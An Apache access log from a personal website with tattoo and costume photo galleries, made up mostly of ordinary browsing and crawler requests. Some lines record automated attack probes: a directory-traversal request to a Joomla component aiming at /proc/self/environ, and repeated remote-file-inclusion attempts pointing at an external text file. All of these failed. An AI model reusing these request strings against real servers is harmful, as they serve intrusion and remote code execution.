72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:45 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:52 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:52 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:52 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:52 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:52 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:52 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:52 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:53 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:53 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:53 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:53 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:57 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:57 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:57 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:57 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:57 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:57 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:57 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:58 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:58 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:58 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:58 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:57:02 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:57:02 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:57:02 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:57:02 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:57:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
66.249.71.205 - - [06/May/2010:11:00:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [06/May/2010:11:03:20 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.175.146.45 - - [06/May/2010:11:08:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
212.175.146.45 - - [06/May/2010:11:10:22 -0500] "GET /logs/access_log.1272067200/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.76"
212.175.146.45 - - [06/May/2010:11:10:22 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
212.175.146.45 - - [06/May/2010:11:10:23 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
218.38.34.19 - - [06/May/2010:11:11:05 -0500] "GET /logs/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:11:11:05 -0500] "GET /logs/access_log.1264550400/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:11:11:05 -0500] "GET /write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.218.116.134 - - [06/May/2010:11:12:00 -0500] "GET /logs/access_log.1238889600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
82.96.90.170 - - [06/May/2010:11:13:56 -0500] "GET /logs/access_log.1217376000/arif? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
82.96.90.170 - - [06/May/2010:11:13:56 -0500] "GET /arif? HTTP/1.1" 404 288 "-""libwww-perl/5.805"
82.96.90.170 - - [06/May/2010:11:13:56 -0500] "GET /logs/arif? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.84 - - [06/May/2010:11:14:22 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.165.81.212 - - [06/May/2010:11:17:59 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://id.wikipedia.org/wiki/Kostum""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:03 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:05 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:05 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:08 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:19 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:29 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:31 -0500] "GET /costume/025_JPG%20copy.jpg HTTP/1.1" 200 48186 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:32 -0500] "GET /costume/026_JPG%20copy.jpg HTTP/1.1" 200 46929 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:32 -0500] "GET /costume/030_JPG%20copy.jpg HTTP/1.1" 200 45745 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:32 -0500] "GET /costume/027_JPG%20copy.jpg HTTP/1.1" 200 46009 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
218.38.34.19 - - [06/May/2010:11:18:33 -0500] "GET /write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:11:18:33 -0500] "GET /logs/access_log.1264723200/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:11:18:33 -0500] "GET /logs/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.165.81.212 - - [06/May/2010:11:18:34 -0500] "GET /costume/029_JPG%20copy.jpg HTTP/1.1" 200 47959 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:36 -0500] "GET /costume/032_JPG%20copy.jpg HTTP/1.1" 200 46966 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:38 -0500] "GET /costume/028_JPG%20copy.jpg HTTP/1.1" 200 51488 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:38 -0500] "GET /costume/033_JPG%20copy.jpg HTTP/1.1" 200 46394 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
218.38.34.19 - - [06/May/2010:11:18:39 -0500] "GET /logs/access_log.1265932800/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.165.81.212 - - [06/May/2010:11:18:40 -0500] "GET /costume/034_JPG%20copy.jpg HTTP/1.1" 200 43973 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:41 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.1" 200 55068 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:43 -0500] "GET /costume/036_JPG%20copy.jpg HTTP/1.1" 200 44291 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:43 -0500] "GET /costume/031_JPG%20copy.jpg HTTP/1.1" 200 44271 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:18:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.195.112.180 - - [06/May/2010:11:19:06 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [06/May/2010:11:19:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "http://www.webring.com/hub?ring=tattoos_s3;id=100;prvw""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.165.81.212 - - [06/May/2010:11:19:08 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:19:18 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.1" 200 155727 "http://tomdolan.pconline.com/costume/cd-page1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:19:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
87.250.255.243 - - [06/May/2010:11:19:31 -0500] "GET /logs/access_log.1244419200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.165.81.212 - - [06/May/2010:11:20:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:16 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:17 -0500] "GET /costume/costume61%20copy.JPG HTTP/1.1" 200 18054 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:18 -0500] "GET /costume/costume64%20copy.JPG HTTP/1.1" 200 16453 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:18 -0500] "GET /costume/costume62%20copy.JPG HTTP/1.1" 200 16357 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:18 -0500] "GET /costume/costume65%20copy.JPG HTTP/1.1" 200 18435 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:18 -0500] "GET /costume/costume63%20copy.JPG HTTP/1.1" 200 17743 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:18 -0500] "GET /costume/costume66%20copy.JPG HTTP/1.1" 200 17118 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:19 -0500] "GET /costume/costume67%20copy.JPG HTTP/1.1" 200 17016 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:20 -0500] "GET /costume/costume68%20copy.JPG HTTP/1.1" 200 17278 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:20 -0500] "GET /costume/costume69%20copy.JPG HTTP/1.1" 200 16551 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:21 -0500] "GET /costume/costume71%20copy.JPG HTTP/1.1" 200 15824 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:22 -0500] "GET /costume/costume72%20copy.JPG HTTP/1.1" 200 17645 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
